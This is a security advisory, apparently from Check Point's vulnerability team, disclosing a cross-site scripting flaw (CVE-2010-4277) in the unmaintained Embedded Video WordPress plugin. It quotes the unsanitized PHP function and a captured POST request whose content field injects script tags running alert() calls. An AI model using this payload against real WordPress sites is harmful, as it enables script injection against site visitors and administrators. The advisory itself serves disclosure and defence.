Embedded Video WordPress Plugin Cross Site Scripting

`Check Point Software Technologies - Vulnerability Discovery Team (VDT)  
http://www.checkpoint.com/defense/  
  
Embedded Video WordPress Plugin Cross Site Scripting Vulnerability  
CVE-2010-4277  
  
  
INTRODUCTION  
  
Embedded Video is a WordPress Plugin created by Jovel Stefan to easily embedded videos in blog posts. The videos can be uploaded to the web server  
or come from external portals (like YouTube, Google Video and others). Links to the video on the video portal or for download of the video can be  
automatically generated as well. The linktext is also configurable individually. Furthermore a fixed prefix for the linktext can be determined. The   
videos can be integrated easily by using the built-in WYSIWYG editor. The plugin has a Cross Site Script (XSS) vulnerability.  
  
This problem was confirmed in the latest version of the plugin, other versions maybe also affected.   
  
The developer of the replied to the advisory in a very responsible and fast manner, but unfortunately, there will be no updates due to the fact that   
this plugin is not maintained anymore.  
  
  
CVSS Scoring System  
  
The CVSS score is: 6.4  
Base Score: 6.7  
Temporal Score: 6.4  
We used the following values to calculate the scores:  
Base score is: AV:N/AC:L/Au:N/C:C/I:C/A:N  
Temporal score is: E:F/RL:U/RC:C  
  
  
DETAILS  
  
The file lembedded-video.php does not sanitize content variable, it is possible to inject malformed data by Javascript.  
  
Code affected:  
  
function embeddedvideo_plugin($content) {  
$output = preg_replace_callback(REGEXP_1, 'embeddedvideo_plugin_callback', $content);  
$output = preg_replace_callback(REGEXP_2, 'embeddedvideo_plugin_callback', $output);  
$output = preg_replace_callback(REGEXP_3, 'embeddedvideo_plugin_callback', $output);  
return ($output);  
}  
  
Request:  
http://<server>/wordpress/wp-admin/post.php  
POST /wordpress/wp-admin/post.php HTTP/1.1  
Host: <server>  
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.12) Gecko/20101026  
Firefox/3.6.12  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-us,en;q=0.5  
Accept-Encoding: gzip,deflate  
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7  
Keep-Alive: 115  
Connection: keep-alive  
Referer: http://<server>/wordpress/wp-admin/post.php?post=8&action=edit&message=1  
C o o k i e : w o r d p r e s s _ b b f a 5 b 7 2 6 c 6 b 7 a 9 c f 3 c d a 9 3 7 0 b e 3 e e 9 1 = a d m i n  
%7C1290110435%7C7f9fa1a66aec0259906ea15086aea0c8; wp-settings-time-1=1289940308;  
w o r d p r e s s _ t e s t _ c o o k i e = W P + C o o k i e + c h e c k ;  
w o r d p r e s s _ l o g g e d _ i n _ b b f a 5 b 7 2 6 c 6 b 7 a 9 c f 3 c d a 9 3 7 0 b e 3 e e 9 1 = a d m i n  
%7C1290110435%7C68b064d813dd8bfaa5d2d2cdf757848e; wp-settings-1=m1%3Do  
%26m6%3Dc%26m7%3Do  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 1786  
_wpnonce=b2bc367f9c&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost  
% 3 D 8 % 2 6 a c t i o n % 3 D e d i t % 2 6 m e s s a g e  
%3D1&user_ID=1&action=editpost&originalaction=editpost&post_author=1&post_type=post&original_  
post_status=publish&referredby=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin  
%2Fpost.php%3Fpost%3D8%26action%3Dedit&_wp_original_http_referer=http%3A%2F  
%2Flocalhost%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D8%26action  
% 3 D e d i t & p o s t _ I D = 8 & a u t o s a v e n o n c e = 9 6 2 9 3 9 1 7 c 9 & m e t a - b o x - o r d e r -  
n o n c e = c 2 f e 5 5 3 5 c 4 & c l o s e d p o s t b o x e s n o n c e = b a d 9 d c 7 7 5 b & w p -  
preview=&hidden_post_status=publish&post_status=publish&hidden_post_password=&hidden_post_v  
isibility=public&visibility=public&post_password=&mm=11&jj=17&aa=2010&hh=00&mn=05&ss=33&hi  
dden_mm=11&cur_mm=11&hidden_jj=17&cur_jj=17&hidden_aa=2010&cur_aa=2010&hidden_hh=00  
&cur_hh=00&hidden_mn=05&cur_mn=36&original_publish=Update&save=Update&post_category  
% 5 B % 5 D = 0 & p o s t _ c a t e g o r y % 5 B % 5 D = 1 & n e w c a t e g o r y = N e w + C a t e g o r y  
+Name&newcategory_parent=-1&_ajax_nonce-add-category=62352e38f5&tax_input%5Bpost_tag  
% 5 D = & n e w t a g % 5 B p o s t _ t a g  
%5D=&post_title=testando&samplepermalinknonce=4a0d9c8491&content=%5Byoutube+%3Cscript  
+type%3D%22text%2Fjavascript%22%3E%2F%2F+%3C%21%5BCDATA%5B%0D%0Aalert  
%281%29%0D%0A%2F%2F+%5D%5D%3E%3C%2Fscript%3E+%3Cscript+type%3D%22text  
%2Fjavascript%22%3E%2F%2F+%3C%21%5BCDATA%5B%0D%0Aalert%282%29%0D%0A%2F  
%2F+%5D%5D%3E%3C%2Fscript%3E%5D&excerpt=&trackback_url=&meta%5B6%5D%5Bkey  
%5D=_edit_last&_ajax_nonce=5453d93de8&meta%5B6%5D%5Bvalue%5D=1&meta%5B9%5D  
%5Bkey%5D=_edit_lock&_ajax_nonce=5453d93de8&meta%5B9%5D%5Bvalue  
%5D=1289954192&meta%5B8%5D%5Bkey%5D=_wp_old_slug&_ajax_nonce=5453d93de8&meta  
% 5 B 8 % 5 D % 5 B v a l u e % 5 D = & m e t a k e y i n p u t = & m e t a v a l u e = & _ a j a x _ n o n c e - a d d -  
meta=9453fa7f77&advanced_view=1&comment_status=open&ping_status=open&post_name=testan  
do&post_author_override=1  
  
CREDITS  
  
This vulnerability has been brought to our attention by Wagner Elias from Conviso IT Security company (http://www.conviso.com.br) and researched   
internally by Rodrigo Rubira Branco from the Check Point Vulnerability Discovery Team (VDT).  
  
  
  
  
Rodrigo Rubira Branco  
Senior Security Researcher  
Vulnerability Discovery Team (VDT)  
Check Point Software Technologies  
http://www.checkpoint.com/defense  
`